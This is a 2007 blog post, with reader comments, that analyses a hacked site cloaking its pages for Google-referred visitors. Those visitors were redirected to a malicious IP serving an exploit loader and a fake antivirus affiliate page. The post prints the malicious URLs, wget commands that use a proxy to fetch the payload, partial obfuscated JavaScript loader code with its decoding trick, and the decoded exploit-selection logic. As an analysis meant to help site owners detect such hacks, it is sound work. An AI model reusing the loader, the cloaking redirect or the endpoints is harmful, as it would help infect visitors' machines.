The website hack you’d never find

Posted on 23 August 2007 at 22:03 UTC, filed under Hack, disclaimer

Warning: do not try the URLs here unless your system is locked down properly. I suggest using a “virual machine” (I use VMware) to test things like this. The hack itself is complicated, the system is simple – skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [Jonathan Wentworth Associates] the first result is:

Jonathan Wentworth Associates, LTD
Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …
www.jwentworth.com/ – 19k – Cached – Similar pages – Note this

The: “Jonathan Wentworth Associates, LTD” is highlighted and is a link to the web site. If you place the mouse over the link, it shows http://www.jwentworth.com. However, if you click the link it immeately attempts to download the trojan. My McAfee immediatly blocked it.

Looking at the page in question, it doesn’t appear to be hacked, it doesn’t appear to have any kind of scripts injected, etc. However, using LiveHTTPHeaders with Firefox, while doing the same steps (search, click on the top result) you see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
HTTP/1.x 302 Found
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: http://www.jwentworth.com/

Without going through Google, the page is returned right away, just like it should. Search engine crawlers also get it like that. After the step through Google however, the site does a 302 redirect to some IP-Address and then returns to the original site. The average browser won’t see that, but if you’re quick you might spot it in the status-bar. A search engine crawler or any user who knew the address would get there without a redirect and not notice a thing.

Strange.

That’s something that deserves to be looked at more closely. What’s on that server? How could I be able to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an encrypted javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user, coming in from Google, will get redirected and if the IP address is not known, it will trigger a few exploits based on the system the user has and then display an affiliate ad page. The next time the user comes, the redirect will happen but the normal page will be shown.

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you wouldn’t be able to. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely way too many hacks that you would need to check for.

A simple way to check for it would be to use wget to access the page, and check for strange redirects, eg:

>wget –user-agent Firefox –save-headers –referer “http://www.google.com/search?q=duuude” “http://www.jwentworth.com/”

However, as mentioned, that might not work every time.

The technical details

(skip this part, if you are lost already :-) )

The original spotting of the anomaly was using LiveHTTPHeaders with Firefox, while doing the steps: search, click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/
1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/
2.8.28 OpenSSL/0.9.7a
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…
(… added space to prevent linking …)

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
(…)
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we check the URL that is given to see what they are sending? Apparently it can only be triggered once per IP-address and I had already used that chance earlier. In order to view the initial page, I had to find an IP address that was not yet registered with the remote server (at least that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=81.63.140.37:3128

>wget –user-agent “Firefox” –save-headers “http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2Findex%2Ehtml”

Connecting to 81.63.140.37:3128… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified
20:43:23 (79.20 KB/s) – `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%
2Findex.html.2′ saved [414]

The page that was returned was a normal frameset:

  1. <HTML><HEAD><TITLE></TITLE></HEAD>
  2. <frameset framespacing="0" border="0" rows="*,1" frameborder="0">
  3. <frame name="m" src="/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt" scrolling="no" noresize marginwidth="0" marginheight="0">
  4. <frame name="b" src="about:blank" marginwidth="0" marginheight="0" scrolling="auto">
  5. <noframes><BODY>Frames not supported by your browser.</BODY></noframes>
  6. </frameset><body></body></html>

The second frame was kind of funny, “about:blank”? The first one was a bit more interesting though: http://85.255.117.38/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt
Notice the “trk” parameter.

Accessing that page with Opera within a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side just to be sure). I tried to refresh and it returned 404. You could only view the page once.

showhack.jpg

Looking at the files you see some interesting things:

– an encrypted javascript file
– an exploit from free-spy-cam.net
– an affiliate sales page for the antivirus software
– an affiliate signup link on that page

The ZIP-File contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk, they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):

  1. <script language=JavaScript>
  2. function dc(sed) {
  3.   l=sed.length;
  4.   var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 (...) 52,16);
  5.   soot=sed;
  6.   for(j=Math.ceil(l/b);j>0;j--) {
  7.      r='';
  8.      for(i=Math.min(l,b);i>0;l--,i--) {
  9.        saam=t[soot.charCodeAt(p++)-48];
  10.        sttp=saam<<s;w|=sttp;
  11. (...)
  12.      dd1="document";
  13.      dd2="write(r)";
  14.      eval(dd1+"."+dd2)
  15. (...)
  16. dc("AVbFxuGqAk7s5OpH (...) G2ovPVoP9dATq_")
  17. </script>

The contents of the file are encrypted with some variation of Base64 encoding. You can decode the javascript by replacing:
eval(dd1+”.”+dd2)
with
document.write(“<xmp>” + r + “</xmp>”);

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).

  1. (...)
  2.   var WinOS=Get_Win_Version(IEversion);
  3.   PatchList = clientInformation.appMinorVersion;
  4.   switch (WinOS)
  5.   {
  6.    case "wXPw":
  7.     XP_SP2_patched=0;
  8.     FullVersion=clientInformation.appMinorVersion;
  9.     PatchList=FullVersion.split(";");
  10.     for (var i=0; i < PatchList.length; i++) { if (PatchList[i]=="SP2") { XP_SP2_patched=1; } }
  11.     if (XP_SP2_patched==1) { ExploitNumber=9; }
  12. (...)
  13.     location.href="cnte-eshdvvw.htm?trk=zszuyhbinthnpzt";
  14. (...)

It is yet another javascript that triggers an exploit based on the operating system (it even test for XP service pack 2) and browser that the user is using. The exploit is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that’s it’s not a picture of your favorite celebrity, however.

Next steps

You could follow these up with:

  • Checking the whois of the payload-server and notifying the hoster (in this case probable fruitless)
  • Checking the sales page, search for the affiliate ID and the setups running and complain to the affiliate networks about this webmaster
  • Mirror a copy of the original server for analysis
  • Obviously move to a different server, perhaps even a different hoster

Summary

The hacker had managed to patch the server side code (most likely the Apache server) so that
– search engines see the normal page
– new users from search engines are hacked with several exploits and shown an ad for anti-virus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with the Googlebar-data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown on the user’s browser (within the frames). At the same time, the setup could be used to detect almost any kind of cloaking.

Scary stuff.

There are 2 trackback pings to this post.
  1. [...] Der wohl sneaky-ste Website Hack bislang [...]

  2. [...] last time I wrote about a hacked site, it was using a redirect that sent some users to a different site. This kind of hack is pretty [...]

There are 16 comments to this post.
  1. I’m glad you are one of the good guys…you’ve got some scary skills in figuring things out.

  2. When I looked at this in your RSS feed in netvibes it redirected me to the infected site………..

  3. @Patrick: that doesn’t sound too good, but since the exploit only triggers when a user comes from Google, it shouldn’t matter. Is Netvibes interpreting some of the markup? Did it really redirect or did it link to the site?

  4. I tried Netvibes – you don’t get redirected, but you see a part of the content here on their page (at least that’s what I see). I see the name of the person from the original posting on the netvibes page and then this blog entry opens up in a separate window. Maybe I was a bit too sneaky for my own good, I hid that name from indexing by using javascript to display it (so that this page doesn’t rank for his name). Apparently that javascript snippet is executed on the old page, before the redirect to the new window takes place. That could be a security issue in Firefox… (did you use Firefox as well?)

  5. I do use FF. It does just show the persons name at the top of the page.

  6. Good, then it’s not that bad :-) *big sigh of relief*

  7. Indeed rather scary stuff. Possibly one of the nastier exploits I’ve heard of recently.

    I think tracking down the aff codes might help – removing some of the financial gain would be a start. I’m sure the installed payload is also just as nasty given the lengths the hackers have gone to…

  8. Adding a little… You don’t need to use a proxy if you are on windows. Back when we looked at the other hacked site with this same exploit all I had to do was to repair the connection to get a new IP address. And every time after that, when checking LiveHTTPHeaders it triggered the 302.

  9. Great project!! You should be on google payrole!

    John: “That could be a security issue in Firefox” :- given this would you recommend staying with Internet Explorer / Other for security reasons? I was considering Firefox due to repeated “IE not responding”.

    Do you think the antivirus advert (hidden hack redirect) was a joke or a moneyspinner or both?

    BTW FYI I found this page after visiting http://groups.google.com/group/Google_Webmaster_Help-Requests/browse_thread/thread/3238914c52ff7b18/3f4de587650273fc

    After an AVG activex thing popped up in ie7 while visiting a christianity page. I clicked no. Did that mean the page was triggering AVG or a virus pretending to? I ran AVG afterwards and it found a “virus identified exploit.ANI” in my temp. Did I prevent the virus spreading out of temp by clicking NO on the ActiveX request or prevent AVG catching it? What use is the thing in temp anyway?

    Just curious (re:spam protection on this page).. Sum of 7 + 4.. can see how me typing in 11 would partially suggest I was a human; but as 11 is allready show in the field does this mean SHOWING question is redundant? My guess is prob’ no, but I’m so curious :)

    Brilliant work btw.. Tris.

  10. Hi John,

    I’m trying to solve a similar mystery. Can I PM you the URL and see if you have any ideas. I’m trying to trace a cloaked redirect…

  11. John,

    BTW I’ve found Fiddler very useful, but have hit a brick wall.

  12. Oh crap. I’ve been hacked by this.

    I was redirected to this page by a buddy of mine when I mentioned the problem I was having. A few months ago my site stats reported a 90% drop in hits which have all turned into 302 temporary redirect messages.

    What can I do to get rid of this??

  13. I found that some of the sites like this often deploy a cookie the first time you visit, then change it on a later visit. The contents of the cookie determine where they will redirect you.

    My impression was that their intent was to get their money by redirecting click traffic, and then using the virus page to scare away curious return snoopers.

    I also found the Microsoft Spam Double Funnel paper to be useful information http://research.microsoft.com/research/pubs/view.aspx?type=Technical%20Report&id=1269.

  14. I have a similar problem, noticed whenever I search google for my site form another computer I get this redirect to a lvhook.biz with an alert from avg about a trojan. Only once, then subsequent searches goes straight to my site. Is this code hidden on my page somewhere? I reported the problem to my host, but they could find no problem on the server. I’d already worked out it was the google referer that triggered this, and searching found this page. Great work by the way.

  15. Update: I recreated the redirect by browsing through a proxy. I notified my hosting company… sent them the transcript on this page for them to read, and told them to inspect the http.conf file and to look for rewrites. They emailed me back after an hour informing me that they had found the malicious code and removed it, also put measures in to stop it happening again. They were pretty shocked and surprised to say the least. So thankyou for taking the time and effort to post here what happened to you, allowing us to benefit from your experience.

  16. John Burns (11 May 2011 at 9:25 pm):

    Hi, I am pretty sure I have this same hack. It is very tricky. I think it is on 3 of my websites. I clicked my link through google and was forwarded to an affiliate site for a competing company selling a similar product that I sell. I am willing to pay John Mu to do the research for me and find out. Everyone in my organization thinks I’m crazy and that it’s spyware on my computer. However, my buddy with a apple computer also searched on google and clicked through my link on google and ended up on the same redirected site, and he was using a Mac, I am on PC.

    It doesn’t do it all the time, only some times. And it’s not currently doing it right now, but I have seen it happen on multiple occasions. Please contact me I am willing to hire you John Mu to take a look and try to help me prove my organization wrong. They are telling me that it is spyware on my PC(which it could be) but I am almost certain that the website is hacked. Please contact me.

Feel free to leave a reply to this posting.

Warning! Your comment will be lost if you mistype the spam-test or forget to enter your name or e-mail-address. Copy your comment to the clipboard to be sure.

You may use these tags within your reply: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>